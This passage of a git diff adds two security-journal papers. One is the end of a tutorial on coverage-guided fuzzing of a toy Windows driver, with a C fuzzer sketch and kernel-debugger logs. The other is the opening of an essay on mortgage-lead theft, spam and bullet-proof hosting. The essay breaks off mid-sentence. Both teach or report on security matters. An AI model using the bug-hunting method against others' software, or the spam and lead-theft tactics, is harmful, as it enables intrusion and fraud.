edges are lines, and paths are +colored. + + +4) Hypothesis: Code Coverage and Fuzzing + +In the security arena, fuzzing has traditionally manifested potential +security holes by throwing random garbage at a target, hoping that any +given code path will fail in the process of consuming the aforementioned +data. The possibility of execution flowing through a particular block in +code is the sum of probabilities of the conditional branches leading to +blocks. In simplicity, if there are areas of code that are never +executed during typical fuzz testing, then administering code coverage +methodologies will reveal those unexecuted branches. Graphical code +coverage analysis using CFGs helps determine which code path has been +executed even without the use of symbol tables. 
This process allows the
+tester to more easily identify branch execution, and to subsequently
+design fuzz testing methods to properly attain complete code coverage.
+Prior experiments aimed at determining the effectiveness of code
+coverage techniques indicate that ensuring branch execution coverage
+will improve the likelihood of discovery of binary faults.
+
+
+4.1) Process and Kernel Stalking
+
+One of the more difficult questions to answer when testing software for
+vulnerabilities is: ``when is the testing considered finished?'' How do
+we, as vulnerability bug hunters, know when we have completed our
+testing cycle by exhausting all code paths and discovering all possible
+bugs? Because fuzz testing can easily be random, and therefore
+unpredictable, the question of when to conclude testing is often left
+unanswered.
+
+Pedram Amini, who recently released ``Paimei'', coined the term "Process
+Stalking" to describe a set of runtime binary analysis tools intended to
+enhance the visual effect of runtime analysis. His tool includes an IDA
+Pro plug-in paired with GML graph files for easy viewing. His strategy
+amalgamates the processes of runtime profiling through tracing and state
+mapping, which is a graphic model composed of behavior states of a
+binary. Pedram Amini's "Process Stalker" tool suite can be found on his
+personal website (http://pedram.redhive.com) and the reverse engineering
+website OpenRCE (http://www.openrce.org).
+
+
+4.2) Stalking and Fuzzing Go Hand in Hand
+
+Process Stalker was transformed by an individual into a WinDbg extension
+for use in debugging user-mode and kernel-mode scenarios. This tool was
+given the title ``Debug Stalk,'' and until now this tool has remained
+unreleased. Process and Debug Stalker have overcome the static analysis
+visualization setback by implementing runtime binary analysis. Runtime
+analysis using Process and Debug Stalking in conjunction with
+mathematically enhanced CFGs greatly improves the bug hunting mechanisms
+used with fuzz techniques. Users can graphically determine via runtime
+analysis which paths have not been traversed and which blocks have not
+been executed. The user then has the opportunity to refine their testing
+approach to one that is more effective. When testing a large
+application, this technique dramatically reduces the overall workload of
+said scenarios. Therefore, iterations of the Process Stalker and Debug
+Stalk tools will be used for investigating a faulty driver in this
+paper.
+
+Debug Stalk is a Windows debugger plug-in that can be used in places
+where Process Stalking may not be suited, such as in a kernel-mode
+setting.
+
+
+5) Implementation
+
+For the sake of simple illustration, several tools have been created for
+testing our code coverage theories. Some of the test cases have been
+exaggerated and are not real world examples. This testing implementation
+is broken down into three parts: Part I includes sending garbage to the
+device driver with dumb fuzzing; Part II will include smarter fuzzing;
+Part III is a breakdown of how an intelligent level of fuzzing helps
+improve code coverage while testing. First, a very simple device driver
+named pluto.sys was created for the purpose of this paper. It contains
+several blocks of code with decision based branching that will be
+fuzzed. The fuzzer will send iterations of random data to pluto.sys.
After fuzzing has completed, a post-analysis tool will review
+executed code blocks within the driver. Part II will follow the same
+process as Part I; however, it will include an updated fuzzer based on
+our Part I post-analysis that will allow the driver to call into a
+previously unexecuted code region. Part III uses the data collected in
+Parts I and II as an illustrative proof of the benefits of the code
+coverage thesis.
+
+
+5.1) Stalking Setup
+
+Several software components need to be acquired before Stalking can
+begin: the Debug Stalk extension, Pedram's Process Stalker, Python, and
+the GoVisual Diagram Editor (GDE). Pedram's Stalker is listed on both
+his blog and on the OpenRCE website. The Process Stalker contains files
+such as the IDA Pro plug-in, and Python scripts that generate the GML
+graph files that will be imported into GDE. GDE provides a functional
+mechanism for editing and positioning of graphs including clustered
+graphing, creation and deletion of nodes, zooming and scrolling, and
+automatic graph layout. Components can be obtained at the following
+locations:
+
+GDE: http://www.oreas.com/gde_en.php
+Python: http://www.python.org/download
+Proc Stalker: http://www.openrce.org/downloads/details/171/Process Stalker
+Debug Stalk: http://www.nologin.org/code
+
+
+5.2) Installing the Stalker
+
+A walkthrough of installation for Process Stalker and required
+components will be covered briefly in this document; however, more
+detailed steps and descriptions are provided in Pedram's supporting
+manual. The .bpl file generated by the IDA plug-in contains a breakpoint
+list with an entry for each block. The IDA plug-in processstalker.plw
+must be inserted into the IDA Pro plug-ins directory. Restarting IDA
+will allow the application to load the plug-in. A successful
+installation of the IDA plug-in in the log window will be similar to the
+following:
+
+
+[*] pStalker> Process Stalker - Profiler
+[*] pStalker> Pedram Amini
+[*] pStalker> Compiled on Sep 21 2006
+
+
+Generating a .bpl file can be started by pressing Alt+5 within the IDA
+application. A dialog appears. Make sure that ``Enable Instruction
+Colors,'' ``Enable Comments,'' and ``Allow Self Loops'' are all
+selected. Pressing OK will prompt for a ``Save as'' dialog. The .bpl
+file must be named after the binary being watched. For example, if
+calc.exe is being watched, the file name must be calc.exe.bpl. In our
+case, pluto.sys is being watched, so the file name must be
+pluto.sys.bpl. A successful generation of a .bpl file will produce the
+following output in the log window:
+
+
+[*] pStalker> Profile analysis 25% complete.
+[*] pStalker> Profile analysis 50% complete.
+[*] pStalker> Profile analysis 75% complete.
+[*] pStalker> Profile analysis 100% complete.
+
+
+Opening the pluto.sys.bpl file will show that records are colon
+delimited:
+
+
+pluto.sys:0000002e:0000002e
+pluto.sys:0000006a:0000006a
+pluto.sys:0000007c:0000007c
+
+
+5.3) Installing Debug Stalk
+
+
+The Debug Stalk extension can be built as follows. Open the Windows
+2003 Server Build Environment window. Set the DBGSDK_INC_PATH and
+DBGSDK_LIB_PATH environment variables to specify the paths to the
+debugger SDK headers and the debugger SDK libraries, respectively. If
+the SDK is installed at c:\WINDBGSDK, the following would work:
+
+
+set DBGSDK_INC_PATH=c:\WINDBGSDK\inc
+set DBGSDK_LIB_PATH=c:\WINDBGSDK\lib
+
+
+This may vary depending on where the SDK is installed. The directory
+name must not contain a space (' ') in its path.
The next step is to +change directories to the project directory. If Debug Stalk source +code is placed within the samples directory within the SDK (located +at c:\WINDBGSDK), then the following should work: + + +cd c:\WINDBGSDK\samples\dbgstalk-0.0.18 + + +Typing build -cg at the command line to build the Debug Stalk project. +Copy the dbgstalk.dll module from within this distribution to the root +folder of the Debugging Tools for Windows root directory. This is the +folder containing programs like cdb.exe and windbg.exe. If you have a +default installation of "Debugging tools for Windows" already installed, +the following should work: + + +copy dbgstalk.dll "c:\Program Files\Debugging Tools for Windows\" + + +The debugger plug-in should be installed at this point. It is important +to note that Debug Stalk is a fairly new tool and has some reliability +issues. It is a bit flakey and some hacking may be necessary in order to +get it running properly. + + +5.4) Stalking with Kernel Debug + + +5.4.1) Part I + +For testing purposes, a Microsoft Operating System needs to be set up +inside of a Virtual PC environment. Load the pluto.sys driver inside of +the Virtual PC and attach a debug session via Kernel Debug (kd). Once kd +is loaded and attached to a process within the Virtual Machine, Debug +Stalk can be invoked by calling "!dbgstalk.dbgstalk [switches] [.bpl +file path]" at the kd console. For example: + + +C:\Uninformed>kd -k com:port=\\.\pipe\woo,pipe + +Microsoft (R) Windows Debugger Version 6.6.0007.5 +Copyright (c) Microsoft Corporation. All rights reserved. + +Opened \\.\pipe\woo +Waiting to reconnect... +Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE +Kernel Debugger connection established. +Windows XP Kernel Version 2600 (Service Pack 2) UP Free x86 compatible +Product: WinNt, suite: TerminalServer SingleUserTS +Built by: 2600.xpsp_sp2_rtm.040803-2158 +Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20 +Debug session time: Sat Sep 23 14:40:24.522 2006 (GMT-7) +System Uptime: 0 days 0:06:50.610 +Break instruction exception - code 80000003 (first chance) +nt!DbgBreakPointWithStatus+0x4: +804e3b25 cc int 3 +kd> .reload +Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE +Loading Kernel Symbols +....................................................... +Loading User Symbols + +Loading unloaded module list +........... +kd> !dbgstalk.dbgstalk -o -b c:\Uninformed\pluto.sys.bpl +[*] - Entering Stalker +[*] - Break Point List.....: c:\Uninformed\pluto.sys.bpl +[*] - Breakpoint Restore...: OFF +[*] - Register Enumerate...: ON +[*] - Kernel Stalking:.....: ON + +current context: + +eax=00000001 ebx=ffdff980 ecx=8055192c edx=000003f8 esi=00000000 edi=f4be2de0 +eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + + +Once Debug Stalk is loaded, a list of commands is available to the user. A +breakdown of the command line options offered by Debug Stalk is as follows: + + +[m] module list +[0-9] enter recorder modes +[x] stop recording +[v] toggle verbosity +[q] quit/close + + +At this point, the fuzz tool needs to be executed to send random arbitrary data +to the device driver. While the fuzzer is running, Debug Stalk will print out +information to kd. 
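+
+The fuzz tool itself is not included with this paper, but conceptually it
+only needs to open the device exposed by pluto.sys and write random data to
+it in a loop, which is consistent with the WriteFile call visible in the
+crash stack shown later in Part II. The following is a minimal C sketch of
+such a dumb fuzzer; the device name \\.\Pluto, the buffer size, and the
+iteration count are assumptions made purely for illustration.
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(void)
+{
+    /* Open the (assumed) device name exposed by the driver. */
+    HANDLE device = CreateFileA("\\\\.\\Pluto", GENERIC_READ | GENERIC_WRITE,
+                                0, NULL, OPEN_EXISTING, 0, NULL);
+    unsigned char buffer[512];
+    DWORD written, i, j;
+
+    if (device == INVALID_HANDLE_VALUE)
+    {
+        printf("Unable to open device: %lu\n", GetLastError());
+        return 1;
+    }
+
+    for (i = 0; i < 10000; i++)
+    {
+        /* Random length, random content -- classic dumb fuzzing. */
+        for (j = 0; j < sizeof(buffer); j++)
+            buffer[j] = (unsigned char)(rand() & 0xff);
+
+        WriteFile(device, buffer, (rand() % sizeof(buffer)) + 1, &written, NULL);
+    }
+
+    CloseHandle(device);
+    return 0;
+}
+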
Pressing 'g' at the command line prompt will resume +execution of the target machine. This invocation will look something like +this: + + +kd> g +[*] - Recorder Opened......: pluto.sys.0 +[*] - Recorder Opened......: pluto.sys-regs.0 +Modload: Processing breakpoints for module pluto.sys at f7a7f000 +Modload: Done. 46 of 46 breakpoints were set. +0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000 (f7a82000)] +0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx +0034eded T:00000001 [bp] f7a83012 a12810a8f7 mov eax,dword ptr [pluto+0x2028 (f7a81028)] +0034ee89 T:00000001 [bp] f7a8302b e9aed1ffff jmp pluto+0x11de (f7a801de) +0034ef16 T:00000001 [bp] f7a801de 55 push ebp +0034ef93 T:00000001 [bp] f7a80219 8b45fc mov eax,dword ptr [ebp-4] +0034f03f T:00000001 [bp] f7a80253 6844646b20 push 206B6444h +0034f0cb T:00000001 [bp] f7a802a2 b980000000 mov ecx,80h +0034f148 T:00000001 [bp] f7a802ab 5f pop edi +00359086 T:00000001 [bp] f7a8006a 8b4c2408 mov ecx,dword ptr [esp+8] +0035920c T:00000001 [bp] f7a800f6 833d0420a8f700 cmp dword ptr [pluto+0x3004 (f7a82004)],0 +003592a9 T:00000001 [bp] f7a8010c 8b7760 mov esi,dword ptr [edi+60h] +00359345 T:00000001 [bp] f7a80114 8b4704 mov eax,dword ptr [edi+4] +003593e1 T:00000001 [bp] f7a80122 6a10 push 10h +0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax +003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4] +00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi +00359614 T:00000001 [bp] f7a80182 5f pop edi +0035ac5b T:00000001 [bp] f7a8002e 55 push ebp + +current context: + +eax=00000001 ebx=0000c271 ecx=8055192c edx=000003f8 esi=00000001 edi=291f0c30 +eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + +kd> q +[*] - Exiting Stalker +q + + +Debug Stalk has finished Stalking the points in the driver allowed by the +fuzzer. Files named "pluto.sys.0," "pluto.sys-regs.0 (optional)," have been +saved to the current working directory. + + +5.5) Analyzing the output + +Pedram has developed a set of Python scripts to support the .bpl and recorder +output file, such as adding register metadata to the graph, filtering generated +breakpoint lists, additional GDE support for difficult graphs, combining +multi-function graphs into a conglomerate graph, highlighting interesting +blocks, importing back into the IDA changes made directly to the graph, adding +function offsets to breakpoint addresses and optionally rebasing the recording +addresses, and much more. Pedram provides detailed descriptions and usage of +his python scripts in his manual. The Python scripts used for formatting the +.gml files (for block based coverage) are psprocessrecording and +psviewrecordingfuncs. The psprocessrecording script is executed first on the +pluto.sys.0 which will produce another file called +pluto.sys.0.BadFuzz-processed. The psviewrecordingfuncs is executed on the +pluto.sys.0.BadFuzz-processed file to produce the file called BadFuzz.gml, +which is the chosen name for the initial testing technique. More information on +Pedram's Python scripts, reference the Process Stalking Manual. Opening the +resulting .gml file will enable us to view the following graph. 
+
+Executed blocks are shown in pink, unexecuted blocks are shown in grey,
+paths of execution are green lines, and unexecuted paths are red lines. At this
+point it is important to note that the code block starting at address 00011169
+does not get executed. This is detrimental to our testing process because
+fuzzer supplied data is passed to it, yet the block never gets executed. Based
+on this evidence, we can conclude that a readjustment of our testing
+methodologies needs to be put in place so that we can hit that unexecuted
+block.
+
+Analysis indicates that the device driver does not execute block 00011169
+because a comparison is made in the block at address 00011147, which reveals
+that [eax] does not match a specified value. Since eax is pointing to the
+fuzzer supplied data, we should be able to adjust the fuzzer to meet the
+requirement of the 00011161 cmp dword ptr [eax], 0DEADBEEFh instruction, which
+will allow us to get into block 00011169. BetterFuzz.exe was improved to
+accomplish exactly this.
+
+
+5.5.1) Part II
+
+Having determined that the previous testing methodology was not effective, the
+test case has been re-engineered and the driver can now be re-tested in an
+attempt to hit the missed block. Following the steps provided in Part I, the
+driver is loaded into the Virtual PC, kd is attached to the driver process, and
+Debug Stalk has been loaded into kd and has been invoked to run by using the
+'g' command. The entire process is the same except that when the new fuzz test
+is invoked, different output is printed to kd:
+
+kd> g
+[*] - Recorder Opened......: pluto.sys.0
+[*] - Recorder Opened......: pluto.sys-regs.0
+Modload: Processing breakpoints for module pluto.sys at f7a27000
+Modload: Done. 46 of 46 breakpoints were set.
+004047a0 T:00000001 [bp] f7a2b000 a100a0a2f7 mov eax,dword ptr [pluto+0x3000 (f7a2a000)] +004052bc T:00000001 [bp] f7a2b00e 3bc1 cmp eax,ecx +00405339 T:00000001 [bp] f7a2b012 a12890a2f7 mov eax,dword ptr [pluto+0x2028 (f7a29028)] +004053e5 T:00000001 [bp] f7a2b02b e9aed1ffff jmp pluto+0x11de (f7a281de) +00405462 T:00000001 [bp] f7a281de 55 push ebp +004054ee T:00000001 [bp] f7a28219 8b45fc mov eax,dword ptr [ebp-4] +0040558b T:00000001 [bp] f7a28253 6844646b20 push 206B6444h +00405617 T:00000001 [bp] f7a282a2 b980000000 mov ecx,80h +00405694 T:00000001 [bp] f7a282ab 5f pop edi +00406ccc T:00000001 [bp] f7a2806a 8b4c2408 mov ecx,dword ptr [esp+8] +00406e04 T:00000001 [bp] f7a280f6 833d04a0a2f700 cmp dword ptr [pluto+0x3004 (f7a2a004)],0 +00406eb0 T:00000001 [bp] f7a2810c 8b7760 mov esi,dword ptr [edi+60h] +00406f4c T:00000001 [bp] f7a28114 8b4704 mov eax,dword ptr [edi+4] +00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h +00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax +00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4] +004071ae T:00000001 [bp] f7a28169 6a04 push 4 + +current context: + +eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052 +eip=804e3b25 esp=f3cbe720 ebp=f3cbe768 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + +kd> k +ChildEBP RetAddr +f3c1971c 805328e7 nt!RtlpBreakWithStatusInstruction +f3c19768 805333be nt!KiBugCheckDebugBreak+0x19 +f3c19b48 805339ae nt!KeBugCheck2+0x574 +f3c19b68 805246fb nt!KeBugCheckEx+0x1b +f3c19bb4 804e1ff1 nt!MmAccessFault+0x6f5 +f3c19bb4 804da1ee nt!KiTrap0E+0xcc +*** ERROR: Module load completed but symbols could not be loaded for pluto.sys +f3c19c48 f79f0173 nt!memmove+0x72 +WARNING: Stack unwind information not available. Following frames may be wrong. +f3c19c84 8057a510 pluto+0x1173 +f3c19d38 804df06b nt!NtWriteFile+0x602 +f3c19d38 7c90eb94 nt!KiFastCallEntry+0xf8 +0006fec0 7c90e9ff ntdll!KiFastSystemCallRet +0006fec4 7c81100e ntdll!ZwWriteFile+0xc +0006ff24 01001276 kernel32!WriteFile+0xf7 +0006ff44 010013a7 betterfuzz_c!main+0xa4 +0006ffc0 7c816d4f betterfuzz_c!mainCRTStartup+0x12f +0006fff0 00000000 kernel32!BaseProcessStart+0x23 + +current context: + +eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052 +eip=804e3b25 esp=f3c19720 ebp=f3c19768 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + +kd> q +[*] - Exiting Stalker +q + +C:\Uninformed> + +Generating the .gml file allows the tester to view the new execution path. In +this case the block at address 00011169 is executed. All subsequent blocks +underneath it are not executed because the driver BugChecks inside of this +newly hit block indicating a bug of some sort. Command 'k' in kd produces the +stack unwind information and we can see that a BugCheck was initiated for an +Access Violation that occurs inside of pluto.sys. + + +5.6) Part III + +Analysis of the graph BadFuzz.gml generated in Part I indicated that the +testing methods used were not effective enough to exhibit optimal code coverage +of the device driver in question. 
Part II implemented an improved test case
+based on the coverage analysis performed in Part I. Graph BetterFuzz.gml
+allowed the testers to view the improved testing methods and to ensure that the
+missed block was reached. This process revealed a fault in block 00011169 that
+would otherwise have remained undetected without code coverage analysis.
+
+
+6) Conclusion and Future Work
+
+This paper illustrated an improved testing technique by taking advantage of
+code coverage methods using basic graph theory. The author would like to
+reiterate that the driver and fuzz tool used in this paper were simple examples
+to illustrate the effectiveness of code coverage practices.
+
+Finally, more research and experimentation are needed to fully implement these
+techniques. The question remains of how best to integrate a full code coverage
+analysis tool and a fuzzing tool. Much work has been done on code coverage
+techniques and their implementations. For example, the paper entitled
+Cryptographic Verification of Test Coverage Claims by Devanbu, et al presents
+protocols for verifying coverage claims both with and without source code,
+including binary-only verification, and these protocols can utilize both block
+and branch testing. A tool to automate the marriage of code coverage and fuzz
+technologies needs to be implemented so that the two technologies may work
+together without manual investigation. Further research may include more
+sophisticated coverage techniques using graph theory, such as super blocks,
+dominators, and applying weights to frequently used loops, paths, and edges.
+CFGs may also benefit from Bayesian networks, which are directed acyclic graphs
+whose nodes represent variables together with a probability distribution for
+each variable given the values of its parents. In other words, Bayesian theory
+may be helpful for predicting code execution, which can in turn lead to more
+intelligent fuzzing. In closing, the author extends the hope that the methods
+and methodologies shared herein can offer other ideas to researchers.
+
+
+A. References
+
+Devanbu, T (2000). Cryptographic Verification of Test
+Coverage Claims. IEEE. 2, 178-192.
diff --git a/uninformed/5.4.txt b/uninformed/5.4.txt
new file mode 100644
index 0000000..3418170
--- /dev/null
+++ b/uninformed/5.4.txt
@@ -0,0 +1,418 @@
+Wars Within
+9/2006
+Orlando Padilla
+xbud@g0thead.com
+
+
+1) Foreword
+
+Abstract: In this paper I will uncover the information exchange of what
+may be classified as one of the highest money making schemes coordinated
+by 'organized crime'. I will elaborate on information gathered from a
+third party individual directly involved in all aspects of the scheme at
+play. I will provide a detailed explanation of this market's origin,
+followed by a brief description of some of the actions strategically
+performed by these individuals in order to ensure their success.
+Finally, I will elaborate on real world examples of how a single person
+can be labeled a spammer, malware author, cracker, and an entrepreneur
+gone thief. For the purposes of avoiding any legal matters and unwanted
+media, I will refrain from mentioning the names of any individuals and
+corporations who are involved in the schemes described in this paper.
+
+Disclaimer: This document is written with an educational interest and I
+cannot be held liable for any outcome of the information released.
+ +Thanks: vax, Shannon and Katelynn + + +2) Introduction + +It is inherently obvious to anyone who owns a computer that the Internet +has changed the world around us in a significant number of ways. From +an uncountable number of careers to a world-wide open market, it +drastically affected everything around us. Don't worry though, I will +not bore you with another ``The future will look like this ... '' +article. For that, I will refer to you a great book by Michio Kaku +called Visions that is remarkably accurate considering it was written in +the mid 90's. But anyway, why am I restating the obvious? To allow +myself to focus on one not so obvious division of an existing market +developed by a corporation that had previously filed for bankruptcy. I +will elaborate on how it "innovated" one particular market and how that +change resulted in a ripple of disaster and greed. The market is real +estate and my focus is on mortgage leads + +The idea of finding, selling and stealing leads is anything but new, in +fact Hollywood made a movie based entirely on the importance of sales +leads titled 'Boiler Room' starring Giovanni Ribisi, Ben Affleck and Vin +Diesel . The movie illustrates a perfect example of the significance of +even one major lead. + +I will begin by explaining what mortgage leads are, why they are worth +writing a paper about and how certain individuals have made millions off +of them. I will then discuss the roles of the connected individuals and +how they continue to work when trust is the single point of failure. My +decision to write this article is nothing more than informational, I +have no intentions of ruining the lives of the people who make a living +from what I am about to discuss. In fact, it is to my knowledge not +much of a secret at all but I found it fascinating and wish to share my +experiences with anyone willing to listen. + + +3) Guidance + +As I was growing up, my parents discouraged me from working while +attending school. They made a genuine attempt to provide for me the +support that I needed so that I could focus exclusively on my academics. +Their reasoning for this was simple - Once you start making money, +you'll forget what is important in life and will simply want to follow +this path. As you read through this paper, ask yourself how true this +actually is. + + +Financial gain drives every market around the world, and quite honestly +there are very few things the world as a whole has not yet done for +money. To quantify what my parents' believe, I will describe how the +lives of the people involved vary from the lives they once lived, and +from the lives of a person working a nine-to-five job. + + +4) The Entity + +Mortgage leads, referred to as leads from this point on, are nothing +more than a selective set of criteria consisting of the following: + + +First Name +Last Name +Phone +City +State +Zip +Email +Loan Type +Loan Amount +Affiliate ID +Domain Ref. +Date + + +Each lead must contain at least the above criteria with the exception of +perhaps Affiliate ID and Domain Reference to be worth anything to a +buyer. Furthermore, the more reliable a set of leads is, the more it is +worth to a buyer. A buyer? You ask. Well, financing firms are +indirectly involved in this scheme; finance firms take the information +you sold to them, and follow up with the people allegedly interested in +buying, refinancing or applying for a home loan. 
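+
+For illustration only, the criteria above can be thought of as a simple
+flat record. The following C sketch is not taken from any collector's
+actual code; the field names and sizes are hypothetical, and in practice
+this data would more likely live as a row in a MySQL or MSSQL table, a
+point that comes up again later in this paper.
+
+/* Hypothetical layout of a single mortgage lead record. */
+struct lead
+{
+    char first_name[32];
+    char last_name[32];
+    char phone[16];
+    char city[32];
+    char state[3];        /* two-letter state code plus terminator */
+    char zip[10];
+    char email[64];
+    char loan_type[16];   /* e.g. purchase or refinance */
+    long loan_amount;     /* requested amount in US dollars */
+    long affiliate_id;    /* ID of the mailer who generated the lead */
+    char domain_ref[64];  /* referring domain, when present */
+    char date[11];        /* YYYY-MM-DD */
+};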
+
+
+4.1) Background
+
+To fully understand who is selling the collected information and to
+elaborate on who is buying the information listed above, I'll introduce
+hypothetical Corporation A to play the role of the real company. Corp.
+A is a mortgage firm in decline; not only are they on the verge of
+closing shop, but they have already filed for Chapter 11 bankruptcy and
+are out of viable options for recovery. As a last resort they decide to
+offer money in exchange for possible loan application candidate leads.
+This quickly gained momentum, as the Internet was a prime place for
+accumulating such information. The plan eventually imploded, but before
+diving into what the outcome was, I'll elaborate on how this truly
+became its own market.
+
+
+4.2) Numbers
+
+Initially each collector averaged about 200 leads per sale, which drove
+just enough profit to keep the company afloat. The term collector, used
+in this paper in its loosest sense, is a name given to an individual who
+collects mortgage leads for the purpose of attaining a profit. A lead
+was first bought at a flat rate of 10 US dollars, so at an average of
+200 leads per sale the profit for the collector was a comfortable 2,000
+US dollars. On the flip side of things, Corp. A was successfully
+conducting business, averaging about 10 sales for every 100 leads they
+bought. With these numbers consistently coming through, Corp. A made a
+profit of about 10,000 US dollars for every successful sale. A little
+math illustrates the return on investment ratio:
+
+
+Investment:           200 leads x 10 USD    = 2,000
+Average Profit:       20 sales x 10,000 USD = 200,000
+Return on Investment: 200,000 - 2,000       = 198,000
+
+
+Based on the collection of an insignificant amount of information,
+collectors aggressively innovated their collection methods. I will
+elaborate on what I mean shortly. For now, I will focus on what happened
+immediately after.
+
+New collection methods drove the lead delivery out of control and soon
+Corp. A was inundated with so many leads that they had to start turning
+them down until they figured out how to process the volume. In order to
+handle the number of leads they were now attaining, they decided to
+partner with smaller companies and sell them the overflow. Corp. A was
+now growing exponentially fast, and in a period of roughly five to six
+years, this simple idea drove Corp. A from bankruptcy to a multi-billion
+dollar corporation. It is actually rumored that at one point in time
+this company consumed 100 percent of the mortgage leads ever processed
+in the United States.
+
+People and greed do not mix very well, and as I mentioned earlier,
+collectors and partners wanted more money, so soon other companies began
+buying leads from collectors too. I argue that at the time the mortgage
+industry was large enough for everyone to profit nicely from it; however,
+greedy collectors began selling bogus or non-exclusive leads. This
+forced mortgage firms to develop a loose classification model for
+grading the quality of a lead in addition to the classification of the
+leads themselves.
+
+- Exclusive
+
+  An exclusive lead is one that is sold to only one mortgage firm and
+  never again redistributed. The value of these leads was often higher
+  than that of non-exclusive leads, or, as they decided to term them,
+  semi-exclusive leads.
+
+- Semi-Exclusive
+
+  Yes, semi-exclusive. I honestly cannot define this, as the term is an
+  oxymoron in itself, but someone somewhere
+  decided to call non-exclusive leads semi-exclusive to allow them to be
+  resold (an individual who wishes to stay anonymous informed me of the
+  terms commonly used in this industry). It's a nice euphemism, though.
+
+
+Grade   | Description
+--------+-------------
+Green   | Confirmed Valid Lead
+Yellow  | Characteristics of a bad lead but enough good to buy
+Red     | Confirmed Invalid Lead
+
+The reliability of a bulk set is assessed by the person buying them at
+the time of sale. The person interested in buying the leads takes a
+random set from the bulk he is receiving and personally verifies their
+validity. A rating is then given depending on the number of missed
+leads he finds. The grading is different with every person you deal
+with, but in short a lead is only Green if validated. A validated lead
+is one that is confirmed through the person whose information was sold
+to begin with (the loan application candidate). A yellow lead is a lead
+with all information accurate but the candidate was either not home or
+for some reason was not available. Last, a red lead is a confirmed
+invalid or bogus lead. A number of things can give away a bad lead; for
+example, a Zip code and State that do not match, or a name of John Doe
+with an address on Elm Street, are probable indications of a bad lead.
+
+
+5) The War
+
+Now that I have indulged you with the whereabouts and importance of a
+lead, I will discuss how leads are obtained. I mentioned above how far
+an individual will go as a result of greed; below I describe their
+actions, which outline their (at times) unethical behavior and
+persistence in attaining more of the goods.
+
+
+5.1) Self Indulgence
+
+When the collector decides to go a straight route (in terms of their
+industry), they can invest some time and money into setting up an
+infrastructure to lure potential clients to their web site. They first
+need to build a site that resembles a loan agency and allows visitors
+to send their applications to them. Once the collector has a website
+saving information to a database, he then hires mailers, or spammers, to
+advertise his website. The average return on spam has been extremely
+dynamic, and with more advanced filtering mechanisms in place, all a
+spammer can hope for is more effective evasion methods. The leads
+collected through this method are, on average, valued between eight and
+twelve US dollars per lead, only because they are exclusive opt-ins. An
+opt-in is a user who wishes to receive information regarding the service
+or product you provide (i.e., no one else should have this information,
+as it was obtained directly from the client). There have been instances,
+however, when leads were scarce and opt-ins sold for over twenty US
+dollars a lead. Semi-exclusive (or non-exclusive) leads, on the other
+hand, usually sell for half the price of an exclusive lead or less.
+
+The second method of collection is not as trivial as the first one
+sounds, although the first is a bit more involved than I actually
+described. I will elaborate further on what it takes to successfully
+build the infrastructure described above shortly.
+
+
+5.2) Thievery
+
+Thievery obviously refers to stealing, and to steal, the collector has
+to choose from an abundance of targets. Essentially, anyone
+constructing an environment to collect leads themselves is a possible
+target. Things fall into place fairly easily for a collector wanting to
+find more targets -- recall how collectors use mailers as resources to
+advertise their websites?
+This is a pretty viable method for collection; however, alternative
+methods do exist, and collectors use any and all possible enumeration
+methods they can think of. First, let's dive into the details of what
+collectors looking to construct websites need to do before hiring
+mailers, since this is directly related to the enumeration of targets.
+
+
+5.3) Setting up an Infrastructure
+
+So far all this seems pretty straightforward; the collectors set up a
+webserver to collect information about the people interested in mortgage
+loans, and the mailers responsible for advertising get a sales commission
+for leads collected by their spam run (spam being unsolicited e-mail,
+often of a commercial nature, sent indiscriminately to multiple mailing
+lists, individuals, or newsgroups; in other words, junk e-mail). To
+complete the cycle, the people interested in loans receive an email which
+sparks their interest and they navigate to the link found in the email.
+Collectors are usually ambitious and make an eager attempt at keeping
+their domains, websites, and mailers going round the clock. In the United
+States it is illegal to spam a person without their consent, so websites
+(the loan forms) that are advertised through spam and hosted on a
+webserver in the US are not too common, though they do exist. The easiest
+thing for a collector to do is to find a hosting provider in a communist
+country with no regard for the content placed on their servers. The
+technical term for this type of service is bullet-proof-hosting. A
+bullet-proof-host is a node on a provider's network with extremely loose
+Terms of Service, often allowing them to spam or host any content they
+wish. Usually the provider resides in a third world or communist country.
+The average price for such a service is about 2,500 US dollars a month.
+An alternative to dishing out large amounts of cash for hosting services
+is using a bot network, a distributed collection of agents (bots)
+connected to and controlled by a central authority. Usually though, bot
+networks are pretty dynamic and don't fit the necessary requirements to
+host this type of content. If a collector pays a mailer to spam his site
+for two or three days and the host goes down the first night (because of
+an unreliable bot host), a lot is lost, so experienced folks generally
